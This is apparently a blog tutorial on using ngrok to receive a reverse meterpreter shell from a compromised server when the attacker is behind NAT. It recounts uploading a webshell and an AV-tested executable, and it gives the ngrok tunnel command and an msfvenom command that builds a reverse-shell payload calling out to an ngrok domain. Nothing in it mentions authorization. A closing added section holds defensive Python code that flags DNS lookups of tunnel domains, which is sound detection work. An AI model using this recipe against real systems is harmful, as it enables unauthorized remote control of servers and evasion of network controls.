When running Metasploit locally on my own system, I can't always set up a reverse connection through NAT.
Now here's the current situation!
- I found a server vulnerable to remote code execution (RCE).
- Uploaded a webshell to gather some info.
- Uploaded an exe after carefully testing it against the AV installed on the server.
- Booted up metasploit.
- Tried to exploit it to get a bind shell, but unfortunately the bind shell is not working (firewall, as always).
- Let's do a Reverse then ;)
- But there's another problem :(
- I'm sitting in an office and sadly I don't have the router login credentials to set up port forwarding :(
Now what to do?
Here comes Ngrok to the rescue. :D
What's Ngrok?
"secure introspected tunnels to localhost" & "Expose local servers behind NATs and firewalls to the public internet over secure tunnels." - taken directly from their website
Setting up Ngrok
1. Register with ngrok. (It doesn't verify the email address, though.)
2. Once you're logged in, just follow the instructions. You'll get a screen like this.
3. Once the setup is done, run the following command so that ngrok listens for TCP connections on a random public port and forwards them to our system behind NAT:
./ngrok tcp 80
4. Generate a meterpreter exe with the ngrok settings and set up a handler to accept the reverse meterpreter connection:
msfvenom -p windows/meterpreter/reverse_tcp_dns lport=12791 lhost=<ngrok domain> -f exe -o test.exe
The above command will generate a simple exe with a meterpreter stub. NOTE: I'm NOT sharing techniques for bypassing AVs. Also, please do not upload your exe to any online scanner (if custom made); that's a very stupid thing to do. Better to use vt-notify by @Mubix. A great tool!
5. Now execute the exe and you'll see the words that'll make you go crazy - "Sending Stage bytes" ;)
Now where did "127.0.0.1" come from? o_O
Ngrok is forwarding the connection to our local system, so obviously it shows "127.0.0.1" to us. When the handler receives the stager connection and starts sending the stage to the server, the traffic goes through our localhost's forwarded port.
The Ngrok dashboard can help you see the number of connections you're getting.
6. A drawback of this method: you can't get multiple meterpreter sessions over a single port. For multiple sessions, you have to repeat all the steps with a different port.
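From the defender's side, the setup above still depends on the implant resolving a public tunnel hostname over DNS (a reverse_tcp_dns payload pointed at an ngrok domain), which makes resolver logs a natural place to spot it. This is an added example, not code from the original post: a small Python check that counts lookups of tunnel-provider domains per client. The log line format, client addresses and sample names are constructed, and the suffix list is an assumption to verify and extend for your own environment.

```python
import re
from collections import Counter

# Constructed sample resolver log (format assumed: timestamp, client, "query:", name, type).
SAMPLE_DNS_LOG = """\
2024-03-01T10:00:01Z 10.0.0.15 query: www.example.com A
2024-03-01T10:00:02Z 10.0.0.15 query: 0.tcp.ngrok.io A
2024-03-01T10:00:02Z 10.0.0.15 query: 0.tcp.ngrok.io A
2024-03-01T10:00:07Z 10.0.0.22 query: updates.example.org A
2024-03-01T10:00:09Z 10.0.0.15 query: 0.tcp.ngrok.io A
2024-03-01T10:00:12Z 10.0.0.40 query: abc123.ngrok-free.app A
"""

# Domain suffixes used by ngrok tunnels at time of writing (assumption; add other
# tunnel providers you care about). Matching is on whole labels, so "notngrok.io"
# does not match "ngrok.io".
TUNNEL_SUFFIXES = ("ngrok.io", "ngrok-free.app", "ngrok.app")

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+query:\s+(?P<name>\S+)\s+(?P<qtype>\S+)$"
)


def is_tunnel_name(name):
    """True if the queried name is, or sits under, a known tunnel-provider domain."""
    name = name.rstrip(".").lower()  # tolerate a trailing dot from FQDN logging
    return any(name == s or name.endswith("." + s) for s in TUNNEL_SUFFIXES)


def find_tunnel_lookups(log_text):
    """Map (client, queried name) -> number of lookups for tunnel-provider domains.

    Lines that do not match the expected format are skipped rather than raising,
    since real resolver logs mix in comments and other record types.
    """
    hits = Counter()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and is_tunnel_name(m["name"]):
            hits[(m["client"], m["name"].rstrip(".").lower())] += 1
    return dict(hits)


if __name__ == "__main__":
    for (client, name), n in sorted(find_tunnel_lookups(SAMPLE_DNS_LOG).items()):
        print(f"{client} resolved {name} {n} time(s)")
```

Repeated lookups of the same tunnel hostname from one internal host, as with 10.0.0.15 in the sample, are the pattern worth alerting on, since a legitimate developer tunnel rarely looks like a beaconing implant.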
I Hope this helps.
Thanks & Cheers!!